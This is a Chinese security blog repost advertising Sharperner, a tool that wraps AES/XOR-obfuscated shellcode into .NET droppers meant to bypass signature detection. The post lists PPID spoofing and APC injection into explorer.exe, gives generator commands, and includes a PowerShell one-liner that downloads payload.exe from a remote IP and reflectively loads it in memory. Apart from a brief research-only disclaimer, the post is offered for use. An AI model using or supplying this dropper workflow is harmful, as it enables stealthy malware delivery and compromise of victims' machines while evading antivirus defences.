Sharperner是一个用 CSharp 编写的工具,它使用 AES 和 XOR 混淆的 shellcode 生成 .NET dropper生成的可执行文件可能可以绕过签名检查。
PE
-
PPID欺骗
-
随机生成的 AES 密钥和 iv
-
最终的 Shellcode、Key 和 IV
.NET
-
AES + XOR 加密的 shellcode
-
APC 进程注入 (explorer.exe)
-
随机函数名
-
随机生成的 AES 密钥和 iv
-
最终的 Shellcode、Key 和 IV
使用方法
/file B64,hex,raw shellcode/type cs,cpp/out Output file Location (Optional)Example:Sharperner.exe /file:file.txt /type:cppSharperner.exe /file:file.txt /out:payload.exe
生成的 .NET 可执行文件可以使用 powershell 反射加载
$data = ( New-Object System.Net.WebClient).DownloadData( ' http://10.10.10.10/payload.exe ' )$assem = [ System.Reflection.Assembly ]::Load( $data )[ TotallyNotMal.程序]::Main()
项目地址
https://github.com/aniqfakhrul/Sharperner/releases/tag/0.1
本文始发于微信公众号(Khan安全攻防实验室):Sharperner - Shellcode生成器
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论